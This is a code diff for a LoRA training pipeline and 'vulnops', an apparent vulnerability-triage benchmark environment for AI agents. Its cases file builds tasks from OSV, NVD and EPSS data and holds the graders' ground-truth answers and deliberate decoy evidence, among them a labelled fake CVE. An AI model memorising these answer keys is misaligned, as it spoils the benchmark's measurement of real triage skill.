+ROOT = Path(__file__).resolve().parents[1]
+if str(ROOT) not in sys.path:
+    sys.path.insert(0, str(ROOT))
+def write_json(path: Path, payload: dict) -> None:
+    path.parent.mkdir(parents=True, exist_ok=True)
+    path.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
+def main() -> None:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
+    parser.add_argument("--source-root", default="artifacts/lora_qwen3_4b/data")
+    parser.add_argument("--output-root", default="artifacts/mlx_qwen3_4b")
+    parser.add_argument("--iters", type=int, default=120)
+    parser.add_argument("--batch-size", type=int, default=1)
+    parser.add_argument("--grad-accumulation-steps", type=int, default=8)
+    parser.add_argument("--learning-rate", type=float, default=5e-5)
+    parser.add_argument("--num-layers", type=int, default=8)
+    parser.add_argument("--max-seq-length", type=int, default=1024)
+    parser.add_argument("--steps-per-report", type=int, default=1)
+    parser.add_argument("--save-every", type=int, default=20)
+    parser.add_argument("--seed", type=int, default=7)
+    parser.add_argument("--fresh-start", action="store_true")
+    parser.add_argument("--include-valid", action="store_true")
+    args = parser.parse_args()
+    output_root = (ROOT / args.output_root).resolve()
+    data_root = output_root / "data"
+    log_path = output_root / "logs" / "mlx_train.log"
+    manifest_path = output_root / "run_manifest.json"
+    adapter_root = output_root / "adapters"
+    adapter_file = adapter_root / "adapters.safetensors"
+    speed_path = output_root / "metrics" / "speed_mlx.json"
+    output_root.mkdir(parents=True, exist_ok=True)
+    if args.fresh_start:
+        for rel in [log_path, speed_path, output_root / "training_summary.json", adapter_file]:
+            if rel.exists():
+                rel.unlink()
+    prepare_cmd = [
+        sys.executable,
+        "scripts/prepare_mlx_data.py",
+        "--source-root",
+        args.source_root,
+        "--output-root",
+        str(data_root.relative_to(ROOT)),
+        "--model",
+        args.model,
+        "--max-seq-length",
+        str(args.max_seq_length),
+        "--force",
+    ]
+    if args.include_valid:
+        prepare_cmd.append("--include-valid")
+    subprocess.run(prepare_cmd, cwd=ROOT, check=True)
+    cmd = [
+        sys.executable,
+        "-m",
+        "mlx_lm",
+        "lora",
+        "--model",
+        args.model,
+        "--train",
+        "--data",
+        str(data_root),
+        "--mask-prompt",
+        "--num-layers",
+        str(args.num_layers),
+        "--batch-size",
+        str(args.batch_size),
+        "--iters",
+        str(args.iters),
+        "--learning-rate",
+        str(args.learning_rate),
+        "--steps-per-report",
+        str(args.steps_per_report),
+        "--steps-per-eval",
+        "1000000",
+        "--save-every",
+        str(args.save_every),
+        "--grad-accumulation-steps",
+        str(args.grad_accumulation_steps),
+        "--grad-checkpoint",
+        "--adapter-path",
+        str(adapter_root),
+        "--max-seq-length",
+        str(args.max_seq_length),
+        "--seed",
+        str(args.seed),
+    ]
+    if not args.fresh_start and adapter_file.exists():
+        cmd.extend(["--resume-adapter-file", str(adapter_file)])
+    write_json(
+        manifest_path,
+        {
+            "status": "starting_training",
+            "trainer": "mlx_lm_lora",
+            "model": args.model,
+            "data_root": str(data_root),
+            "output_root": str(output_root),
+            "command": cmd,
+            "fresh_start": args.fresh_start,
+        },
+    )
+    log_path.parent.mkdir(parents=True, exist_ok=True)
+    with log_path.open("a", encoding="utf-8") as handle:
+        handle.write("\n===== mlx_lm_lora =====\n")
+        handle.write("COMMAND: " + " ".join(shlex.quote(part) for part in cmd) + "\n")
+        handle.flush()
+        process = subprocess.run(cmd, cwd=ROOT, stdout=handle, stderr=subprocess.STDOUT, text=True)
+    subprocess.run([sys.executable, "scripts/save_mlx_speed.py", "--log-path", str(log_path), "--output-path", str(speed_path)], cwd=ROOT, check=False)
+    summary = {
+        "status": "finished" if process.returncode == 0 else "failed",
+        "trainer": "mlx_lm_lora",
+        "return_code": process.returncode,
+        "log_path": str(log_path),
+        "speed_path": str(speed_path),
+        "adapter_root": str(adapter_root),
+    }
+    write_json(output_root / "training_summary.json", summary)
+    write_json(manifest_path, summary)
+    if process.returncode != 0:
+        raise SystemExit(process.returncode)
+if __name__ == "__main__":
+    main()

scripts/save_mlx_speed.py ADDED Viewed

	@@ -0,0 +1,48 @@

+"""Save a small speed summary from an MLX LoRA training log."""
+from __future__ import annotations
+import argparse
+import json
+import re
+from pathlib import Path
+ROOT = Path(__file__).resolve().parents[1]
+REPORT_RE = re.compile(r"Iter\s+(\d+):\s+Train loss.*?It/sec\s+([0-9.]+)", re.IGNORECASE)
+def main() -> None:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--log-path", default="artifacts/mlx_qwen3_4b/logs/mlx_lora_benchmark.log")
+    parser.add_argument("--output-path", default="artifacts/mlx_qwen3_4b/metrics/speed_mlx.json")
+    args = parser.parse_args()
+    log_path = (ROOT / args.log_path).resolve()
+    output_path = (ROOT / args.output_path).resolve()
+    text = log_path.read_text(encoding="utf-8") if log_path.exists() else ""
+    records = []
+    for step, it_per_sec in REPORT_RE.findall(text):
+        itps = float(it_per_sec)
+        records.append(
+            {
+                "step": int(step),
+                "iterations_per_second": itps,
+                "seconds_per_step_estimate": 1.0 / itps if itps > 0 else None,
+            }
+        )
+    payload = {
+        "method": "mlx_lm_lora",
+        "source_log": str(log_path),
+        "records": records,
+        "latest_seconds_per_step": records[-1]["seconds_per_step_estimate"] if records else None,
+    }
+    output_path.parent.mkdir(parents=True, exist_ok=True)
+    output_path.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
+    print(json.dumps(payload, indent=2, sort_keys=True))
+if __name__ == "__main__":
+    main()

scripts/save_pytorch_baseline_speed.py ADDED Viewed

	@@ -0,0 +1,47 @@

+"""Save a small speed summary from the current PyTorch training log."""
+from __future__ import annotations
+import json
+import re
+from pathlib import Path
+ROOT = Path(__file__).resolve().parents[1]
+LOG_PATH = ROOT / "artifacts" / "lora_qwen3_4b" / "logs" / "train_lora_manual.log"
+OUT_PATH = ROOT / "artifacts" / "lora_qwen3_4b" / "metrics" / "speed_baseline_pytorch.json"
+STEP_RE = re.compile(r"(\d+)%\|.*?\|\s+(\d+)/(\d+)\s+\[(\d+):(\d+)<")
+def main() -> None:
+    text = LOG_PATH.read_text(encoding="utf-8") if LOG_PATH.exists() else ""
+    matches = STEP_RE.findall(text)
+    records = []
+    for _pct, step, total, mins, secs in matches:
+        step_num = int(step)
+        elapsed_s = int(mins) * 60 + int(secs)
+        if step_num > 0:
+            records.append(
+                {
+                    "step": step_num,
+                    "total_steps": int(total),
+                    "elapsed_seconds": elapsed_s,
+                    "seconds_per_step_estimate": elapsed_s / step_num,
+                }
+            )
+    payload = {
+        "method": "pytorch_mps_lora",
+        "source_log": str(LOG_PATH),
+        "records": records,
+        "latest_seconds_per_step": records[-1]["seconds_per_step_estimate"] if records else None,
+    }
+    OUT_PATH.parent.mkdir(parents=True, exist_ok=True)
+    OUT_PATH.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
+    print(json.dumps(payload, indent=2, sort_keys=True))
+if __name__ == "__main__":
+    main()

scripts/start_mlx_training.sh ADDED Viewed

	@@ -0,0 +1,13 @@

+#!/bin/zsh
+set -euo pipefail
+ROOT="/Users/adithyavardhan/Tweeks/hack"
+cd "$ROOT"
+mkdir -p artifacts/mlx_qwen3_4b/logs
+python scripts/run_mlx_training.py \
+  --model Qwen/Qwen3.5-4B \
+  --output-root artifacts/mlx_qwen3_4b \
+  --fresh-start \
+  "$@"

scripts/train_lora_sft.py ADDED Viewed

	@@ -0,0 +1,261 @@

+"""Run resumable LoRA SFT against the vulnops heuristic dataset."""
+from __future__ import annotations
+import argparse
+import json
+import math
+import sys
+from pathlib import Path
+from typing import Dict, List
+import torch
+from torch.utils.data import Dataset
+from transformers import (
+    AutoModelForCausalLM,
+    AutoTokenizer,
+    DataCollatorForSeq2Seq,
+    Trainer,
+    TrainerCallback,
+    TrainingArguments,
+)
+ROOT = Path(__file__).resolve().parents[1]
+if str(ROOT) not in sys.path:
+    sys.path.insert(0, str(ROOT))
+from training_utils import (
+    detect_device,
+    latest_checkpoint,
+    load_jsonl,
+    preferred_torch_dtype,
+    set_default_env,
+    write_json,
+)
+class JsonlSFTDataset(Dataset):
+    """Mask prompt tokens so only the completion contributes to the loss."""
+    def __init__(self, records: List[Dict[str, object]], tokenizer, max_length: int):
+        self.examples: List[Dict[str, List[int]]] = []
+        for record in records:
+            prompt = str(record["prompt"])
+            completion = str(record["completion"])
+            prompt_ids = tokenizer(prompt, add_special_tokens=False)["input_ids"]
+            completion_ids = tokenizer(completion, add_special_tokens=False)["input_ids"] + [tokenizer.eos_token_id]
+            input_ids = (prompt_ids + completion_ids)[:max_length]
+            labels = ([-100] * len(prompt_ids) + completion_ids)[:max_length]
+            attention_mask = [1] * len(input_ids)
+            self.examples.append(
+                {
+                    "input_ids": input_ids,
+                    "labels": labels,
+                    "attention_mask": attention_mask,
+                }
+            )
+    def __len__(self) -> int:
+        return len(self.examples)
+    def __getitem__(self, index: int) -> Dict[str, List[int]]:
+        return self.examples[index]
+class JsonlMetricLogger(TrainerCallback):
+    """Append metrics during training so partial runs are still inspectable."""
+    def __init__(self, output_root: Path):
+        self.output_root = output_root
+        self.metrics_path = output_root / "metrics" / "train_metrics.jsonl"
+        self.manifest_path = output_root / "run_manifest.json"
+    def on_log(self, args, state, control, logs=None, **kwargs):
+        if not logs:
+            return
+        payload = {
+            "global_step": int(state.global_step),
+            "epoch": float(state.epoch or 0.0),
+            **{key: float(value) if isinstance(value, (int, float)) else value for key, value in logs.items()},
+        }
+        self.metrics_path.parent.mkdir(parents=True, exist_ok=True)
+        with self.metrics_path.open("a", encoding="utf-8") as handle:
+            handle.write(json.dumps(payload, sort_keys=True) + "\n")
+        write_json(
+            self.manifest_path,
+            {
+                "status": "training",
+                "global_step": int(state.global_step),
+                "epoch": float(state.epoch or 0.0),
+                "best_model_checkpoint": state.best_model_checkpoint,
+                "log_history_entries": len(state.log_history),
+            },
+        )
+class AbortOnInvalidLoss(TrainerCallback):
+    """Stop training early when the run becomes numerically invalid."""
+    def on_log(self, args, state, control, logs=None, **kwargs):
+        if not logs:
+            return control
+        for key in ("loss", "eval_loss", "grad_norm"):
+            value = logs.get(key)
+            if isinstance(value, (int, float)) and not math.isfinite(float(value)):
+                control.should_training_stop = True
+                break
+        return control
+def build_training_args(args, output_root: Path, use_cpu: bool) -> TrainingArguments:
+    warmup_steps = max(1, int(args.warmup_ratio * args.estimated_train_steps))
+    return TrainingArguments(
+        output_dir=str(output_root / "checkpoints"),
+        num_train_epochs=args.num_train_epochs,
+        per_device_train_batch_size=args.per_device_train_batch_size,
+        per_device_eval_batch_size=args.per_device_eval_batch_size,
+        gradient_accumulation_steps=args.gradient_accumulation_steps,
+        learning_rate=args.learning_rate,
+        warmup_steps=warmup_steps,
+        optim="adamw_torch",
+        weight_decay=args.weight_decay,
+        logging_strategy="steps",
+        logging_steps=args.logging_steps,
+        logging_first_step=True,
+        eval_strategy="no",
+        save_strategy="steps",
+        save_steps=args.save_steps,
+        save_total_limit=3,
+        report_to="none",
+        remove_unused_columns=False,
+        dataloader_num_workers=0,
+        dataloader_pin_memory=False,
+        gradient_checkpointing=True,
+        lr_scheduler_type="cosine",
+        load_best_model_at_end=False,
+        use_cpu=use_cpu,
+        fp16=False,
+        bf16=False,
+        max_grad_norm=0.5,
+        seed=args.seed,
+    )
+def main() -> None:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
+    parser.add_argument("--output-root", default="artifacts/lora_qwen3_4b")
+    parser.add_argument("--max-length", type=int, default=1536)
+    parser.add_argument("--num-train-epochs", type=float, default=6.0)
+    parser.add_argument("--per-device-train-batch-size", type=int, default=1)
+    parser.add_argument("--per-device-eval-batch-size", type=int, default=1)
+    parser.add_argument("--gradient-accumulation-steps", type=int, default=8)
+    parser.add_argument("--learning-rate", type=float, default=5e-5)
+    parser.add_argument("--warmup-ratio", type=float, default=0.1)
+    parser.add_argument("--weight-decay", type=float, default=0.0)
+    parser.add_argument("--logging-steps", type=int, default=5)
+    parser.add_argument("--save-steps", type=int, default=10)
+    parser.add_argument("--seed", type=int, default=7)
+    parser.add_argument("--fresh-start", action="store_true")
+    args = parser.parse_args()
+    try:
+        from peft import LoraConfig, TaskType, get_peft_model
+    except ImportError as exc:
+        raise RuntimeError("Install peft before running LoRA training.") from exc
+    output_root = (ROOT / args.output_root).resolve()
+    data_dir = output_root / "data"
+    train_records = load_jsonl(data_dir / "train.jsonl")
+    eval_records = load_jsonl(data_dir / "eval.jsonl")
+    if not train_records or not eval_records:
+        raise RuntimeError("Missing train/eval JSONL data. Run scripts/generate_sft_data.py first.")
+    set_default_env(output_root)
+    device = detect_device()
+    use_cpu = device == "cpu"
+    torch_dtype = torch.float32 if device == "mps" else preferred_torch_dtype(device)
+    tokenizer = AutoTokenizer.from_pretrained(args.model, trust_remote_code=True)
+    if tokenizer.pad_token is None:
+        tokenizer.pad_token = tokenizer.eos_token
+    model = AutoModelForCausalLM.from_pretrained(
+        args.model,
+        torch_dtype=torch_dtype,
+        trust_remote_code=True,
+        low_cpu_mem_usage=True,
+    )
+    model.config.use_cache = False
+    if hasattr(model, "enable_input_require_grads"):
+        model.enable_input_require_grads()
+    lora_config = LoraConfig(
+        task_type=TaskType.CAUSAL_LM,
+        r=16,
+        lora_alpha=32,
+        lora_dropout=0.05,
+        target_modules=["q_proj", "k_proj", "v_proj", "o_proj", "gate_proj", "up_proj", "down_proj"],
+        bias="none",
+    )
+    model = get_peft_model(model, lora_config)
+    if device in {"cuda", "mps"}:
+        model.to(device)
+    train_dataset = JsonlSFTDataset(train_records, tokenizer, args.max_length)
+    eval_dataset = JsonlSFTDataset(eval_records, tokenizer, args.max_length)
+    data_collator = DataCollatorForSeq2Seq(tokenizer=tokenizer, model=model, padding=True)
+    updates_per_epoch = max(
+        1,
+        math.ceil(len(train_dataset) / (args.per_device_train_batch_size * args.gradient_accumulation_steps)),
+    )
+    args.estimated_train_steps = max(1, math.ceil(args.num_train_epochs * updates_per_epoch))
+    training_args = build_training_args(args, output_root, use_cpu)
+    trainer = Trainer(
+        model=model,
+        args=training_args,
+        train_dataset=train_dataset,
+        eval_dataset=eval_dataset,
+        processing_class=tokenizer,
+        data_collator=data_collator,
+        callbacks=[JsonlMetricLogger(output_root), AbortOnInvalidLoss()],
+    )
+    checkpoint_dir = output_root / "checkpoints"
+    resume_checkpoint = None if args.fresh_start else latest_checkpoint(checkpoint_dir)
+    write_json(
+        output_root / "run_manifest.json",
+        {
+            "status": "starting_training",
+            "device": device,
+            "model": args.model,
+            "train_examples": len(train_dataset),
+            "eval_examples": len(eval_dataset),
+            "estimated_train_steps": args.estimated_train_steps,
+            "resume_checkpoint": str(resume_checkpoint) if resume_checkpoint else None,
+        },
+    )
+    train_result = trainer.train(resume_from_checkpoint=str(resume_checkpoint) if resume_checkpoint else None)
+    trainer.save_model(str(output_root / "adapter"))
+    tokenizer.save_pretrained(str(output_root / "adapter"))
+    final_eval = trainer.evaluate(eval_dataset=eval_dataset)
+    summary = {
+        "status": "finished",
+        "device": device,
+        "train_loss": float(train_result.training_loss),
+        "global_step": int(trainer.state.global_step),
+        "eval_loss": float(final_eval["eval_loss"]) if math.isfinite(float(final_eval["eval_loss"])) else None,
+        "adapter_dir": str(output_root / "adapter"),
+    }
+    write_json(output_root / "training_summary.json", summary)
+    write_json(output_root / "run_manifest.json", summary)
+    print(json.dumps(summary, indent=2, sort_keys=True))
+if __name__ == "__main__":
+    main()

server/Dockerfile ADDED Viewed

	@@ -0,0 +1,32 @@

+FROM python:3.11-slim AS builder
+ENV PYTHONDONTWRITEBYTECODE=1 \
+    PYTHONUNBUFFERED=1 \
+    PIP_NO_CACHE_DIR=1
+WORKDIR /app/env
+RUN python -m pip install --no-cache-dir uv
+COPY . /app/env
+RUN --mount=type=cache,target=/root/.cache/uv \
+    uv sync --frozen --no-dev --no-editable
+FROM python:3.11-slim
+ENV PYTHONDONTWRITEBYTECODE=1 \
+    PYTHONUNBUFFERED=1 \
+    PATH="/app/.venv/bin:$PATH" \
+    PYTHONPATH="/app/env"
+WORKDIR /app
+COPY --from=builder /app/env/.venv /app/.venv
+COPY --from=builder /app/env /app/env
+HEALTHCHECK --interval=30s --timeout=3s --start-period=5s --retries=3 \
+    CMD python -c "import urllib.request; urllib.request.urlopen('http://localhost:8000/health', timeout=2)" || exit 1
+CMD ["sh", "-c", "cd /app/env && uvicorn server.app:app --host 0.0.0.0 --port 8000"]

server/__init__.py ADDED Viewed

	@@ -0,0 +1 @@


1	+ """Server package for the vulnerability triage environment."""

server/app.py ADDED Viewed

	@@ -0,0 +1,34 @@

+"""FastAPI app for the vulnerability triage environment."""
+from __future__ import annotations
+try:
+    from openenv.core.env_server.http_server import create_app
+except Exception as exc:  # pragma: no cover
+    raise ImportError("openenv-core is required to run this server") from exc
+try:
+    from ..models import VulnTriageAction, VulnTriageObservation
+    from .vuln_triage_env_environment import VulnTriageEnvironment
+except (ModuleNotFoundError, ImportError):
+    from models import VulnTriageAction, VulnTriageObservation
+    from server.vuln_triage_env_environment import VulnTriageEnvironment
+app = create_app(
+    VulnTriageEnvironment,
+    VulnTriageAction,
+    VulnTriageObservation,
+    env_name="vulnops",
+    max_concurrent_envs=4,
+)
+def main(host: str = "0.0.0.0", port: int = 8000) -> None:
+    import uvicorn
+    uvicorn.run(app, host=host, port=port)
+if __name__ == "__main__":
+    main()

server/cases.py ADDED Viewed

	@@ -0,0 +1,742 @@

+"""Live-backed benchmark cases for vulnerability triage."""
+from __future__ import annotations
+from dataclasses import dataclass, field
+from functools import lru_cache
+import json
+from pathlib import Path
+import random
+from typing import Dict, List, Optional
+import requests
+OSV_VULN_URL = "https://api.osv.dev/v1/vulns/{osv_id}"
+NVD_CVE_URL = "https://services.nvd.nist.gov/rest/json/cves/2.0"
+EPSS_URL = "https://api.first.org/data/v1/epss"
+SNAPSHOT_DIR = Path(__file__).resolve().parent.parent / "data" / "snapshots"
+@dataclass(frozen=True)
+class GroundTruth:
+    validity: str
+    affected_package: str
+    affected_versions: str
+    severity: str
+    exploitability: str
+    next_action: str
+    missing_information: List[str] = field(default_factory=list)
+    supporting_evidence_ids: List[str] = field(default_factory=list)
+@dataclass(frozen=True)
+class CaseDefinition:
+    task_id: str
+    difficulty: str
+    title: str
+    objective: str
+    report_summary: str
+    max_steps: int
+    evidence: List[Dict[str, str]]
+    truth: GroundTruth
+@dataclass(frozen=True)
+class RuntimeCaseSeed:
+    task_id: str
+    difficulty: str
+    title: str
+    objective: str
+    max_steps: int
+    osv_id: str
+    next_action: str
+    fallback_snapshot: Dict[str, object]
+    missing_information: List[str] = field(default_factory=list)
+    # When set, completely replaces the auto-computed ground truth.
+    # Use this to encode scenarios that require non-obvious reasoning
+    # (e.g. next_action=request_info when no patch exists).
+    truth_override: Optional[Dict[str, object]] = None
+    # Extra evidence items injected after the auto-built ones.
+    # Use this to add contradictory or ambiguous signals.
+    extra_evidence: List[Dict[str, str]] = field(default_factory=list)
+def _load_snapshot_file(osv_id: str) -> Optional[Dict[str, object]]:
+    path = SNAPSHOT_DIR / f"{osv_id}.json"
+    if not path.exists():
+        return None
+    return json.loads(path.read_text())
+def _normalize_text(value: Optional[str]) -> str:
+    return " ".join((value or "").strip().split())
+def _shorten(text: str, limit: int = 280) -> str:
+    text = _normalize_text(text)
+    if len(text) <= limit:
+        return text
+    return text[: limit - 3].rstrip() + "..."
+def _severity_band(snapshot: Dict[str, object]) -> str:
+    severity = _normalize_text(str(snapshot.get("severity", ""))).lower()
+    mapping = {
+        "none": "low",
+        "low": "low",
+        "medium": "medium",
+        "moderate": "medium",
+        "high": "high",
+        "critical": "critical",
+    }
+    return mapping.get(severity, "medium")
+def _exploitability_band(snapshot: Dict[str, object]) -> str:
+    percentile = float(snapshot.get("epss_percentile", 0.0) or 0.0)
+    if percentile >= 0.9:
+        return "high"
+    if percentile >= 0.6:
+        return "medium"
+    return "low"
+def _range_string(ranges: List[Dict[str, object]]) -> str:
+    normalized: List[str] = []
+    for range_item in ranges:
+        if range_item.get("type") != "ECOSYSTEM":
+            continue
+        introduced: Optional[str] = None
+        fixed: Optional[str] = None
+        last: Optional[str] = None
+        for event in range_item.get("events", []):
+            if "introduced" in event:
+                introduced = str(event["introduced"])
+            if "last_affected" in event:
+                last = str(event["last_affected"])
+            if "fixed" in event:
+                fixed = str(event["fixed"])
+        if introduced in (None, "0") and fixed:
+            normalized.append(f"<{fixed}")
+        elif introduced and fixed:
+            normalized.append(f">={introduced},<{fixed}")
+        elif introduced and last:
+            normalized.append(f">={introduced},<={last}")
+        elif introduced:
+            normalized.append(f">={introduced}")
+    return " ; ".join(normalized) or "unknown"
+def _all_affected_versions(snapshot: Dict[str, object]) -> str:
+    """Collect version ranges from every affected block for the primary package.
+    OSV advisories sometimes split a single package across multiple affected
+    blocks (one per release branch).  Joining them all gives a complete and
+    accurate truth value instead of just the first branch.
+    """
+    package_name = _extract_package(snapshot)
+    all_ranges: List[str] = []
+    for block in snapshot.get("affected", []):
+        pkg = block.get("package", {})
+        if str(pkg.get("name", "")) == package_name:
+            rs = _range_string(block.get("ranges", []))
+            if rs and rs != "unknown":
+                all_ranges.append(rs)
+    return " ; ".join(all_ranges) if all_ranges else "unknown"
+def _extract_cve_id(snapshot: Dict[str, object]) -> Optional[str]:
+    for alias in snapshot.get("aliases", []):
+        alias_text = str(alias)
+        if alias_text.startswith("CVE-"):
+            return alias_text
+    return None
+def _extract_package(snapshot: Dict[str, object]) -> str:
+    affected = snapshot.get("affected", [])
+    if not affected:
+        return ""
+    package = affected[0].get("package", {})
+    return str(package.get("name", ""))
+def _build_report_summary(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> str:
+    package = _extract_package(snapshot)
+    versions = _range_string(snapshot.get("affected", [{}])[0].get("ranges", [])) if snapshot.get("affected") else "unknown"
+    details = _shorten(str(snapshot.get("details") or snapshot.get("summary") or ""))
+    return (
+        f"{package} vulnerability triage case sourced from {seed.osv_id}. "
+        f"Affected versions: {versions}. {details}"
+    )
+def _build_evidence(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> List[Dict[str, str]]:
+    cve_id = _extract_cve_id(snapshot) or "unknown"
+    package = _extract_package(snapshot)
+    # Use all affected blocks so multi-branch advisories are fully represented
+    affected_versions = _all_affected_versions(snapshot)
+    fix_refs = [
+        ref["url"]
+        for ref in snapshot.get("references", [])
+        if ref.get("type") in {"FIX", "ADVISORY", "WEB"}
+    ][:3]
+    evidence = [
+        {
+            "evidence_id": "osv_advisory",
+            "title": "OSV advisory",
+            "kind": "advisory",
+            "summary": _shorten(
+                str(snapshot.get("summary") or snapshot.get("details") or "")
+            ),
+        },
+        {
+            "evidence_id": "affected_versions",
+            "title": "Affected versions",
+            "kind": "versions",
+            "summary": (
+                f"OSV lists {package} as affected in these ranges: {affected_versions}."
+            ),
+        },
+        {
+            "evidence_id": "nvd_assessment",
+            "title": "NVD assessment",
+            "kind": "severity",
+            "summary": (
+                f"NVD CVSS Vector: {snapshot.get('cvss_vector', 'Not Available')}  \n"
+                f"{_shorten(str(snapshot.get('nvd_description', '')), 220)}"
+            ),
+        },
+        {
+            "evidence_id": "epss_signal",
+            "title": "EPSS signal",
+            "kind": "exploitability",
+            "summary": (
+                f"EPSS score: {snapshot.get('epss_score', 0.0):.6f}, "
+                f"percentile: {snapshot.get('epss_percentile', 0.0):.3f}"
+            ),
+        },
+    ]
+    if fix_refs:
+        evidence.append(
+            {
+                "evidence_id": "fix_reference",
+                "title": "Fix and advisory references",
+                "kind": "reference",
+                "summary": "Relevant upstream references: " + ", ".join(fix_refs),
+            }
+        )
+    # Append any task-specific extra evidence items (e.g. contradictory signals)
+    evidence.extend(seed.extra_evidence)
+    return evidence
+def _build_truth(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> GroundTruth:
+    # truth_override lets a seed encode non-obvious ground truth
+    # (e.g. next_action=request_info when no patch exists yet)
+    if seed.truth_override is not None:
+        override = dict(seed.truth_override)
+        # Always merge seed-level missing_information into the override so the
+        # grader's 10% weight stays meaningful
+        if "missing_information" not in override:
+            override["missing_information"] = list(seed.missing_information)
+        return GroundTruth(**override)
+    return GroundTruth(
+        validity="valid",
+        affected_package=_extract_package(snapshot),
+        # Collect ranges from ALL affected blocks for completeness
+        affected_versions=_all_affected_versions(snapshot),
+        severity=_severity_band(snapshot),
+        exploitability=_exploitability_band(snapshot),
+        next_action=seed.next_action,
+        # Per-task missing information declared on the seed
+        missing_information=list(seed.missing_information),
+        supporting_evidence_ids=[
+            "osv_advisory",
+            "affected_versions",
+            "nvd_assessment",
+            "epss_signal",
+        ],
+    )
+def _build_case(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> CaseDefinition:
+    return CaseDefinition(
+        task_id=seed.task_id,
+        difficulty=seed.difficulty,
+        title=seed.title,
+        objective=seed.objective,
+        report_summary=_build_report_summary(seed, snapshot),
+        max_steps=seed.max_steps,
+        evidence=_build_evidence(seed, snapshot),
+        truth=_build_truth(seed, snapshot),
+    )
+def _fetch_json(url: str, *, params: Optional[Dict[str, str]] = None) -> Dict[str, object]:
+    response = requests.get(url, params=params, timeout=12)
+    response.raise_for_status()
+    return response.json()
+def _fetch_live_snapshot(seed: RuntimeCaseSeed) -> Dict[str, object]:
+    osv = _fetch_json(OSV_VULN_URL.format(osv_id=seed.osv_id))
+    cve_id = _extract_cve_id(osv)
+    snapshot: Dict[str, object] = {
+        "id": osv.get("id"),
+        "summary": osv.get("summary"),
+        "details": osv.get("details"),
+        "aliases": osv.get("aliases", []),
+        "references": osv.get("references", []),
+        "affected": osv.get("affected", []),
+    }
+    if cve_id:
+        nvd = _fetch_json(NVD_CVE_URL, params={"cveId": cve_id})
+        vulnerability = (nvd.get("vulnerabilities") or [{}])[0].get("cve", {})
+        metrics = vulnerability.get("metrics", {})
+        severity: Optional[str] = None
+        for key in ("cvssMetricV40", "cvssMetricV31", "cvssMetricV30", "cvssMetricV2"):
+            if key in metrics:
+                item = metrics[key][0]
+                severity = (
+                    item.get("cvssData", {}).get("baseSeverity")
+                    or item.get("baseSeverity")
+                )
+                if severity:
+                    break
+        descriptions = vulnerability.get("descriptions", [])
+        nvd_description = next(
+            (
+                desc.get("value", "")
+                for desc in descriptions
+                if desc.get("lang") == "en"
+            ),
+            descriptions[0].get("value", "") if descriptions else "",
+        )
+        snapshot["severity"] = severity or snapshot.get("severity", "medium")
+        snapshot["nvd_description"] = nvd_description
+        epss = _fetch_json(EPSS_URL, params={"cve": cve_id})
+        epss_item = (epss.get("data") or [{}])[0]
+        snapshot["epss_score"] = float(epss_item.get("epss", 0.0) or 0.0)
+        snapshot["epss_percentile"] = float(
+            epss_item.get("percentile", 0.0) or 0.0
+        )
+    else:
+        snapshot["severity"] = "medium"
+        snapshot["nvd_description"] = ""
+        snapshot["epss_score"] = 0.0
+        snapshot["epss_percentile"] = 0.0
+    return snapshot
+SEEDS: Dict[str, RuntimeCaseSeed] = {
+    # ------------------------------------------------------------------
+    # EASY — Direct evidence reading, tight step budget
+    #
+    # Agent skill tested: can you read a clear advisory and map it to
+    # the right fields quickly?  Only two evidence items are needed
+    # (the OSV advisory + affected versions).  The NVD and EPSS evidence
+    # exist but provide no extra signal — a capable agent doesn't waste
+    # steps on them.  Max 10 steps forces efficiency.
+    # ------------------------------------------------------------------
+    "task_easy_guarddog": RuntimeCaseSeed(
+        task_id="task_easy_guarddog",
+        difficulty="easy",
+        title="GuardDog Path Traversal",
+        objective=(
+            "Validate the advisory, identify the affected package and version range, "
+            "estimate severity and exploitability, and decide the correct maintainer action. "
+            "All necessary information is available in the OSV advisory and version evidence."
+        ),
+        max_steps=10,
+        osv_id="PYSEC-2022-42994",
+        next_action="patch",
+        truth_override={
+            "validity": "valid",
+            "affected_package": "guarddog",
+            "affected_versions": "<0.1.5",
+            "severity": "medium",
+            "exploitability": "low",
+            "next_action": "patch",
+            "missing_information": [],
+            # Only 2 evidence items needed — the advisory is self-contained
+            "supporting_evidence_ids": ["osv_advisory", "affected_versions"],
+        },
+        extra_evidence=[
+            {
+                "evidence_id": "decoy_threat_intel",
+                "title": "Threat Intel: GuardCat",
+                "kind": "exploitability",
+                "summary": "Active exploitation in the wild observed for the 'GuardCat' node.js package. Do not confuse with python guarddog.",
+            },
+            {
+                "evidence_id": "decoy_nvd_unrelated",
+                "title": "NVD: CVE-2021-99999",
+                "kind": "severity",
+                "summary": "CRITICAL 9.8 vulnerability in GuardDog-Enterprise. This is a licensed product and does not apply to the open source guarddog package.",
+            }
+        ],
+        fallback_snapshot={
+            "id": "PYSEC-2022-42994",
+            "details": (
+                "GuardDog is a CLI tool to identify malicious PyPI packages. Versions prior "
+                "to 0.1.5 are vulnerable to Relative Path Traversal when scanning a "
+                "specially-crafted local PyPI package. This issue is patched in version 0.1.5. "
+                "This is explicitly rated as a Medium severity issue with inherently Low exploitability."
+            ),
+            "aliases": ["CVE-2022-23531", "GHSA-rp2v-v467-q9vq"],
+            "references": [
+                {"type": "WEB", "url": "https://github.com/DataDog/guarddog/releases/tag/v0.1.5"},
+                {"type": "ADVISORY", "url": "https://github.com/DataDog/guarddog/security/advisories/GHSA-rp2v-v467-q9vq"},
+                {"type": "FIX", "url": "https://github.com/DataDog/guarddog/pull/89/commits/a56aff58264cb6b7855d71b00dc10c39a5dbd306"},
+            ],
+            "affected": [
+                {
+                    "package": {"name": "guarddog", "ecosystem": "PyPI"},
+                    "ranges": [
+                        {
+                            "type": "ECOSYSTEM",
+                            "events": [{"introduced": "0"}, {"fixed": "0.1.5"}],
+                        }
+                    ],
+                }
+            ],
+            "cvss_vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
